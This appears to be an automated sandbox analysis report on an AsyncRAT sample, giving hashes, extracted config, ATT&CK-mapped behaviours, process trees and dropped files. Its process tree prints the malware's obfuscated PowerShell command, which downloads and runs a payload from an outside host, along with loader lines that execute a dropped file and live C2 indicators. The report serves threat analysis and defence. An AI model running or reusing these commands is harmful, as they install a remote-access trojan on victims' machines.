asyncrat | 7c90be507201a13383ab3f2eaebc6e8ddef40981892ee4464a16b4e04c455487

General

Target

7c90be507201a13383ab3f2eaebc6e8ddef40981892ee4464a16b4e04c455487.vbs
Size

5KB
MD5

be821d48efa0a9eb55545e3130ddb4c1
SHA1

21c3bf46f4a2f5da81069bc82cacd5e68afa0e78
SHA256

7c90be507201a13383ab3f2eaebc6e8ddef40981892ee4464a16b4e04c455487
SHA512

8a4a4aecfb85bbafca7a0827937c6322a5992df78d606b9b0dc9124ec9d27e33853a645586c132337c53bb9f2c82bf4aaf76290b8206f7fd96e93c0f7155bd33
SSDEEP

48:epIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIjIrOTT+:etPXyTuGZOrHTu5ViajP

Score

10^/10

asyncrat mado-marco discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

MADO-Marco

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/yWgaKKwH

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

25 2960 powershell.exe
41 2960 powershell.exe
43 2960 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

2960 powershell.exe
4672 powershell.exe
312 powershell.exe
212 powershell.exe

flow	pid	process
25	2960	powershell.exe
41	2960	powershell.exe
43	2960	powershell.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

28 pastebin.com
29 pastebin.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

40 api.ipify.org
41 api.ipify.org

flow	ioc
28	pastebin.com
29	pastebin.com

flow	ioc
40	api.ipify.org
41	api.ipify.org

Suspicious use of SetThreadContext 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4672 set thread context of 2096	4672	powershell.exe	aspnet_compiler.exe
PID 312 set thread context of 932	312	powershell.exe	aspnet_compiler.exe
PID 212 set thread context of 312	212	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

aspnet_compiler.exeaspnet_compiler.exeaspnet_compiler.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2960	powershell.exe
2960	powershell.exe
4672	powershell.exe
4672	powershell.exe
312	powershell.exe
312	powershell.exe
212	powershell.exe
212	powershell.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

Processes:

powershell.exepowershell.exeaspnet_compiler.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeIncreaseQuotaPrivilege	2960	powershell.exe
Token: SeSecurityPrivilege	2960	powershell.exe
Token: SeTakeOwnershipPrivilege	2960	powershell.exe
Token: SeLoadDriverPrivilege	2960	powershell.exe
Token: SeSystemProfilePrivilege	2960	powershell.exe
Token: SeSystemtimePrivilege	2960	powershell.exe
Token: SeProfSingleProcessPrivilege	2960	powershell.exe
Token: SeIncBasePriorityPrivilege	2960	powershell.exe
Token: SeCreatePagefilePrivilege	2960	powershell.exe
Token: SeBackupPrivilege	2960	powershell.exe
Token: SeRestorePrivilege	2960	powershell.exe
Token: SeShutdownPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeSystemEnvironmentPrivilege	2960	powershell.exe
Token: SeRemoteShutdownPrivilege	2960	powershell.exe
Token: SeUndockPrivilege	2960	powershell.exe
Token: SeManageVolumePrivilege	2960	powershell.exe
Token: 33	2960	powershell.exe
Token: 34	2960	powershell.exe
Token: 35	2960	powershell.exe
Token: 36	2960	powershell.exe
Token: SeIncreaseQuotaPrivilege	2960	powershell.exe
Token: SeSecurityPrivilege	2960	powershell.exe
Token: SeTakeOwnershipPrivilege	2960	powershell.exe
Token: SeLoadDriverPrivilege	2960	powershell.exe
Token: SeSystemProfilePrivilege	2960	powershell.exe
Token: SeSystemtimePrivilege	2960	powershell.exe
Token: SeProfSingleProcessPrivilege	2960	powershell.exe
Token: SeIncBasePriorityPrivilege	2960	powershell.exe
Token: SeCreatePagefilePrivilege	2960	powershell.exe
Token: SeBackupPrivilege	2960	powershell.exe
Token: SeRestorePrivilege	2960	powershell.exe
Token: SeShutdownPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeSystemEnvironmentPrivilege	2960	powershell.exe
Token: SeRemoteShutdownPrivilege	2960	powershell.exe
Token: SeUndockPrivilege	2960	powershell.exe
Token: SeManageVolumePrivilege	2960	powershell.exe
Token: 33	2960	powershell.exe
Token: 34	2960	powershell.exe
Token: 35	2960	powershell.exe
Token: 36	2960	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	2096	aspnet_compiler.exe
Token: SeDebugPrivilege	312	powershell.exe
Token: SeDebugPrivilege	212	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

Processes:

WScript.exeWScript.exepowershell.exeWScript.exepowershell.exeWScript.exepowershell.exe

description	pid	process	target process
PID 3924 wrote to memory of 2960	3924	WScript.exe	powershell.exe
PID 3924 wrote to memory of 2960	3924	WScript.exe	powershell.exe
PID 4764 wrote to memory of 4672	4764	WScript.exe	powershell.exe
PID 4764 wrote to memory of 4672	4764	WScript.exe	powershell.exe
PID 4672 wrote to memory of 2096	4672	powershell.exe	aspnet_compiler.exe
PID 4672 wrote to memory of 2096	4672	powershell.exe	aspnet_compiler.exe
PID 4672 wrote to memory of 2096	4672	powershell.exe	aspnet_compiler.exe
PID 4672 wrote to memory of 2096	4672	powershell.exe	aspnet_compiler.exe
PID 4672 wrote to memory of 2096	4672	powershell.exe	aspnet_compiler.exe
PID 4672 wrote to memory of 2096	4672	powershell.exe	aspnet_compiler.exe
PID 4672 wrote to memory of 2096	4672	powershell.exe	aspnet_compiler.exe
PID 4672 wrote to memory of 2096	4672	powershell.exe	aspnet_compiler.exe
PID 5028 wrote to memory of 312	5028	WScript.exe	powershell.exe
PID 5028 wrote to memory of 312	5028	WScript.exe	powershell.exe
PID 312 wrote to memory of 932	312	powershell.exe	aspnet_compiler.exe
PID 312 wrote to memory of 932	312	powershell.exe	aspnet_compiler.exe
PID 312 wrote to memory of 932	312	powershell.exe	aspnet_compiler.exe
PID 312 wrote to memory of 932	312	powershell.exe	aspnet_compiler.exe
PID 312 wrote to memory of 932	312	powershell.exe	aspnet_compiler.exe
PID 312 wrote to memory of 932	312	powershell.exe	aspnet_compiler.exe
PID 312 wrote to memory of 932	312	powershell.exe	aspnet_compiler.exe
PID 312 wrote to memory of 932	312	powershell.exe	aspnet_compiler.exe
PID 404 wrote to memory of 212	404	WScript.exe	powershell.exe
PID 404 wrote to memory of 212	404	WScript.exe	powershell.exe
PID 212 wrote to memory of 312	212	powershell.exe	aspnet_compiler.exe
PID 212 wrote to memory of 312	212	powershell.exe	aspnet_compiler.exe
PID 212 wrote to memory of 312	212	powershell.exe	aspnet_compiler.exe
PID 212 wrote to memory of 312	212	powershell.exe	aspnet_compiler.exe
PID 212 wrote to memory of 312	212	powershell.exe	aspnet_compiler.exe
PID 212 wrote to memory of 312	212	powershell.exe	aspnet_compiler.exe
PID 212 wrote to memory of 312	212	powershell.exe	aspnet_compiler.exe
PID 212 wrote to memory of 312	212	powershell.exe	aspnet_compiler.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7c90be507201a13383ab3f2eaebc6e8ddef40981892ee4464a16b4e04c455487.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://megamart.mywire.org:60027/marco/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4672

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2096

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:312

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- System Location Discovery: System Language Discovery
PID:932

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:404

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
3⤵
- System Location Discovery: System Language Discovery
PID:312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7bec8bed8719d4f10a4ad5da735f76a5

SHA1
5063793785c97ca8c2cc1344c17380134817e6fc

SHA256
d526d49ae7a2d23890f3d1ff15bae25a609f6c19d2614a622565fb1469f8c736

SHA512
22ce11472231f11ea0d50a690ddce357bd1c6b7b894873c7c9c8966d15191653583acd9b45d78d47e56b5a444b3329c1eeb1fc1805efe12ada16b08324cd0b2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f9c77599f67e80c0819fd45eb71b02b1

SHA1
e0ccd76537c29235ec033fa3669931cf39cac814

SHA256
126c9c383128f50de77faac8bef0f7c75d224facc95e65a503310d3fe70b76e8

SHA512
2e2a12d6b3c23269f2044cdfd46fc20916787c7abdad7b273549ae636cab6006aff09cab6d25562a476f69e1f0f32bbddf6fa3a56ecb3cb73ddf40ce18bfacca

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1erqeonf.iof.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Music\TvMusic.music

Filesize
436KB

MD5
8bb7707b59cfc368db57d7c4920afc06

SHA1
e632082dec19c627afb2f2ed8f7e9418739e4d7e

SHA256
4a81d32d170e24d97baa57977ba8a2c3a792bb0c9b61e9d121bbef0baf8bb8f9

SHA512
ff4b336d986359f582342ade28ffa030288ffe4ad77914a6f1a8ea4bf63c6e0fdf3b44d09baa7557db2d9bd5ebedd3808ebc01fd279ade602d1c4a0581f485ae

Download Submit
C:\Users\Public\Music\TvMusic.vbs

Filesize
229B

MD5
66a1516e1d1e821084441211567d2e87

SHA1
0e688c9a93ad2cc162ef48ca75e0148e69d95ab1

SHA256
d57293641ff05fea6af21fb73a4064eca49e5979f2395305bdea2a00a5de6717

SHA512
1b77505b03a4a9c2c9437fbb94e828f34ed5b74187a258443af778b9450dc346e7027267e4ad6d33ff96c4036d936eba9dee05efbe136678bec6d0f7b68ecf12

Download Submit
memory/2096-32-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2096-41-0x0000000005FB0000-0x0000000006016000-memory.dmp

Filesize
408KB

Download
memory/2096-40-0x00000000064F0000-0x0000000006A94000-memory.dmp

Filesize
5.6MB

Download
memory/2096-39-0x0000000005C70000-0x0000000005D0C000-memory.dmp

Filesize
624KB

Download
memory/2960-43-0x00000221C3C70000-0x00000221C3E32000-memory.dmp

Filesize
1.8MB

Download
memory/2960-0-0x00007FFFE0FE3000-0x00007FFFE0FE5000-memory.dmp

Filesize
8KB

Download
memory/2960-36-0x00000221C3350000-0x00000221C356C000-memory.dmp

Filesize
2.1MB

Download
memory/2960-10-0x00000221C31C0000-0x00000221C31E2000-memory.dmp

Filesize
136KB

Download
memory/2960-30-0x00007FFFE0FE0000-0x00007FFFE1AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-29-0x00007FFFE0FE3000-0x00007FFFE0FE5000-memory.dmp

Filesize
8KB

Download
memory/2960-42-0x00007FFFE0FE0000-0x00007FFFE1AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-11-0x00007FFFE0FE0000-0x00007FFFE1AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-44-0x00007FFFE0FE0000-0x00007FFFE1AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-45-0x00000221C4370000-0x00000221C4898000-memory.dmp

Filesize
5.2MB

Download
memory/2960-17-0x00007FFFE0FE0000-0x00007FFFE1AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-12-0x00007FFFE0FE0000-0x00007FFFE1AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-49-0x00000221C3350000-0x00000221C356C000-memory.dmp

Filesize
2.1MB

Download
memory/2960-50-0x00007FFFE0FE0000-0x00007FFFE1AA1000-memory.dmp

Filesize
10.8MB

Download
memory/4672-35-0x0000015C50080000-0x0000015C5029C000-memory.dmp

Filesize
2.1MB

Download
memory/4672-31-0x0000015C50040000-0x0000015C5004C000-memory.dmp

Filesize
48KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads